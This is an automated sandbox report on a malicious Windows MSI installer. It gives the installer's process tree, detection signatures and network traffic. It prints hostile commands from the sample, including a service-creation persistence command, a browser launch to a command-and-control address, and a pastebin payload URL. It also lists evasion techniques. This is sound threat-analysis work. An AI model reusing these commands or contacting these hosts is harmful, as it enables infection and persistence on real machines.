Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hBqTrQLya4.msi

Overview

General Information

Sample name:hBqTrQLya4.msi
renamed because original name is a hash value
Original sample name:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7.msi
Analysis ID:1467456
MD5:5421cd4bbb277efc5b163a75cac629ff
SHA1:0d20c0bb978dad6bbd9065ebfc20680c241ac1e0
SHA256:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7
Tags:msi
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 5952 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7072 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5776 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIDD62.tmp (PID: 7392 cmdline: "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\ MD5: 768B35409005592DE2333371C6253BC8)
    • MSIDD92.tmp (PID: 7408 cmdline: "C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ MD5: 768B35409005592DE2333371C6253BC8)
    • windows10.exe (PID: 7416 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8260 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8272 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8288 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8304 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 8312 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
        • windows10.exe (PID: 8524 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7620 cmdline: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7648 cmdline: sc start MeuServico MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 8024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, ProcessId: 7620, ProcessName: sc.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: http://www.audio-tool.netVirustotal: Detection: 5%Perma Link
            Source: http://45.90.123.184/favicon.icoVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllReversingLabs: Detection: 50%
            Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllVirustotal: Detection: 43%Perma Link
            Multi AV Scanner detection for submitted file
            Source: hBqTrQLya4.msiReversingLabs: Detection: 31%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.0% probability
            Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49720 version: TLS 1.2
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004205E9 FindFirstFileExW,12_2_004205E9
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DB05E9 FindFirstFileExW,13_2_00DB05E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_008FD08C FindFirstFileW,14_2_008FD08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00ADD08C FindFirstFileW,26_2_00ADD08C
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.72
            Source: unknownTCP traffic detected without corresponding DNS query: 45.90.123.184
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1Host: 45.90.123.184Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 45.90.123.184Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://45.90.123.184/clientes/inspecionando.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /clientes/inspecionando.php HTTP/1.1Host: 45.90.123.184Connection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://45.90.123.184/clientes/inspecionando.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 07:13:17 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 275Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 39 30 2e 31 32 33 2e 31 38 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address></body></html>
            Source: cont.cmd.2.drString found in binary or memory: http://45.90.123.184/clientes/inspecionando.php
            Source: windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
            Source: windows10.exe, 0000000E.00000000.1282464047.0000000000497000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.audio-tool.net
            Source: windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2679332883.0000000004C6C000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/tBXs1wCj
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.7:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.7:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.7:49720 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: StarBurn.dll.2.drStatic PE information: section name: .ri$
            Source: StarBurn.dll.2.drStatic PE information: section name: .)5y
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B3E928 NtQuerySystemInformation,14_2_01B3E928
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01DBA7C0 NtSetInformationThread,14_2_01DBA7C0
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\49d147.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID686.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID6F5.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID783.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7D3.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8CE.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD62.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD92.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID686.tmpJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041607812_2_00416078
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003ED06012_2_003ED060
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041B33612_2_0041B336
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0042460912_2_00424609
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040F70012_2_0040F700
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040973012_2_00409730
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004118EF12_2_004118EF
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004138A012_2_004138A0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041E91912_2_0041E919
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0040FA8E12_2_0040FA8E
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_0041DB3012_2_0041DB30
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_00422EC512_2_00422EC5
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003F0E9012_2_003F0E90
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DA607813_2_00DA6078
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D7D06013_2_00D7D060
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DAB33613_2_00DAB336
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DB460913_2_00DB4609
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D9F70013_2_00D9F700
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D9973013_2_00D99730
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DA18EF13_2_00DA18EF
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DA38A013_2_00DA38A0
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DAE91913_2_00DAE919
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D9FA8E13_2_00D9FA8E
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DADB3013_2_00DADB30
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00DB2EC513_2_00DB2EC5
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D80E9013_2_00D80E90
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009ACA2C14_2_009ACA2C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009ACB7014_2_009ACB70
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0092FD4014_2_0092FD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BA671014_2_00BA6710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00ADA2CD14_2_00ADA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BB741014_2_00BB7410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00B146B014_2_00B146B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00AED9E014_2_00AED9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00AD2AA014_2_00AD2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00AD5A3414_2_00AD5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00B99F6C14_2_00B99F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00AD9F4D14_2_00AD9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_008FB5B814_2_008FB5B8
